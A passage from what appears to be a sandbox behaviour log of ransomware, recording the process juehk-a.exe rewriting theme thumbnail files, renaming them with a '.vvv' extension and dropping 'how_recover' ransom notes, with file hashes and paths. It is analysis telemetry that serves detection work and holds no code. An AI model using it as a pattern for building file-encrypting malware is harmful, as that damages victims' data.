- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521280
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81510
- mode: close
- sequenceNumber: 1435
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521280
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81524
- mode: open
- sequenceNumber: 1436
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\THMBNAIL.PNG
- filesize: 34916
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499610
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81758
- mode: close
- sequenceNumber: 1437
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\THMBNAIL.PNG
- filesize: 35342
- md5sum: 0b13c6d8f45da9d4a6e087ad1791c9cb
- sha1sum: f9950a2912b4d5cd99974e33f73db785efc947c7
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499610
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81882
- mode: rename
- sequenceNumber: 1438
- filesize: 35342
- md5sum: 0b13c6d8f45da9d4a6e087ad1791c9cb
- sha1sum: f9950a2912b4d5cd99974e33f73db785efc947c7
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499610
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81942
- mode: created
- sequenceNumber: 1439
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521281
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81947
- mode: close
- sequenceNumber: 1440
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521281
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81956
- mode: created
- sequenceNumber: 1441
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521282
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81960
- mode: close
- sequenceNumber: 1442
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AXIS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521282
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81965
- mode: open
- sequenceNumber: 1443
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\THMBNAIL.PNG
- filesize: 20627
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499611
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82050
- mode: close
- sequenceNumber: 1444
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\THMBNAIL.PNG
- filesize: 21054
- md5sum: c3ca2a30d8fd45d083088fb487181909
- sha1sum: 6a0ef6ba88f138d9cef0fce8edec4e90e3ea4ce1
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499611
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82058
- mode: rename
- sequenceNumber: 1445
- filesize: 21054
- md5sum: c3ca2a30d8fd45d083088fb487181909
- sha1sum: 6a0ef6ba88f138d9cef0fce8edec4e90e3ea4ce1
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499611
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82111
- mode: created
- sequenceNumber: 1446
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521283
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82117
- mode: close
- sequenceNumber: 1447
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521283
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82146
- mode: created
- sequenceNumber: 1448
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521284
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82153
- mode: close
- sequenceNumber: 1449
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLENDS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521284
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82160
- mode: open
- sequenceNumber: 1450
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\THMBNAIL.PNG
- filesize: 33009
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499612
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82279
- mode: close
- sequenceNumber: 1451
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\THMBNAIL.PNG
- filesize: 33438
- md5sum: 0beb9adb1c692ba1cae23326decbaa09
- sha1sum: baeaf9cc86b6d91204183abdde3133f6aafa2d1b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499612
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82286
- mode: rename
- sequenceNumber: 1452
- filesize: 33438
- md5sum: 0beb9adb1c692ba1cae23326decbaa09
- sha1sum: baeaf9cc86b6d91204183abdde3133f6aafa2d1b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499612
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82399
- mode: created
- sequenceNumber: 1453
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521285
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82407
- mode: close
- sequenceNumber: 1454
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521285
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82415
- mode: created
- sequenceNumber: 1455
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521286
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82426
- mode: close
- sequenceNumber: 1456
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUECALM\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521286
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82432
- mode: open
- sequenceNumber: 1457
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\THMBNAIL.PNG
- filesize: 27407
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499613
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 82451
- repeat: 5000
- sequenceNumber: 1458
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 82486
- mode: close
- sequenceNumber: 1459
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\THMBNAIL.PNG
- filesize: 27822
- md5sum: 43d41f2f04384561c55a229777457213
- sha1sum: 6fcf8155f98eb23ecdcf96a81b6a87a545744224
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499613
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82497
- mode: rename
- sequenceNumber: 1460
- filesize: 27822
- md5sum: 43d41f2f04384561c55a229777457213
- sha1sum: 6fcf8155f98eb23ecdcf96a81b6a87a545744224
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499613
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82522
- mode: created
- sequenceNumber: 1461
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521287
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82526
- mode: close
- sequenceNumber: 1462
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521287
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82531
- mode: created
- sequenceNumber: 1463
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521288
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82535
- mode: close
- sequenceNumber: 1464
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BLUEPRNT\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521288
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82542
- mode: open
- sequenceNumber: 1465
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\THMBNAIL.PNG
- filesize: 31837
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499614
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82692
- mode: close
- sequenceNumber: 1466
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\THMBNAIL.PNG
- filesize: 32254
- md5sum: bf9c7997208d67525d6a95082bf09ba7
- sha1sum: eb39b4696916512554c391f833c339290eb15ad9
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499614
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82730
- mode: rename
- sequenceNumber: 1467
- filesize: 32254
- md5sum: bf9c7997208d67525d6a95082bf09ba7
- sha1sum: eb39b4696916512554c391f833c339290eb15ad9
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499614
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82810
- mode: created
- sequenceNumber: 1468
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1970324837066841
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82816
- mode: close
- sequenceNumber: 1469
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1970324837066841
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82826
- mode: created
- sequenceNumber: 1470
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521289
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 82830
- mode: close
- sequenceNumber: 1471
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BOLDSTRI\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521289
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 82835
- mode: open
- sequenceNumber: 1472
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\THMBNAIL.PNG
- filesize: 43276
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499615
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83104
- mode: close
- sequenceNumber: 1473
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\THMBNAIL.PNG
- filesize: 43694
- md5sum: c27d762afa47af058a8cf53c8d8520d4
- sha1sum: 4609d542d70a822b93728984f2c0d75de611cb79
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499615
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83113
- mode: rename
- sequenceNumber: 1474
- filesize: 43694
- md5sum: c27d762afa47af058a8cf53c8d8520d4
- sha1sum: 4609d542d70a822b93728984f2c0d75de611cb79
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499615
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83137
- mode: created
- sequenceNumber: 1475
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521290
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83143
- mode: close
- sequenceNumber: 1476
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521290
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83149
- mode: created
- sequenceNumber: 1477
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521291
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83155
- mode: close
- sequenceNumber: 1478
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\BREEZE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521291
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83195
- mode: open
- sequenceNumber: 1479
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\THMBNAIL.PNG
- filesize: 32607
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499616
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83232
- mode: close
- sequenceNumber: 1480
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\THMBNAIL.PNG
- filesize: 33022
- md5sum: 526cbcc09a487c9cb467a00844eb2a13
- sha1sum: 3c6564c9963bf08d9316976832181877588a458e
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499616
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83304
- mode: rename
- sequenceNumber: 1481
- filesize: 33022
- md5sum: 526cbcc09a487c9cb467a00844eb2a13
- sha1sum: 3c6564c9963bf08d9316976832181877588a458e
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499616
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83370
- mode: created
- sequenceNumber: 1482
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521292
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83376
- mode: close
- sequenceNumber: 1483
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521292
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83383
- mode: created
- sequenceNumber: 1484
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521293
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83389
- mode: close
- sequenceNumber: 1485
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CANYON\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521293
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83397
- mode: open
- sequenceNumber: 1486
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\THMBNAIL.PNG
- filesize: 29925
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499617
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83534
- mode: close
- sequenceNumber: 1487
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\THMBNAIL.PNG
- filesize: 30350
- md5sum: 7c444a0f07d11fcb73915eaefcedb527
- sha1sum: 1e316575110adc3141600600130eb436e0076f8b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499617
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83543
- mode: rename
- sequenceNumber: 1488
- filesize: 30350
- md5sum: 7c444a0f07d11fcb73915eaefcedb527
- sha1sum: 1e316575110adc3141600600130eb436e0076f8b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499617
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83563
- mode: created
- sequenceNumber: 1489
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2251799813776191
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83569
- mode: close
- sequenceNumber: 1490
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2251799813776191
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83577
- mode: created
- sequenceNumber: 1491
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521294
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83583
- mode: close
- sequenceNumber: 1492
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CAPSULES\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
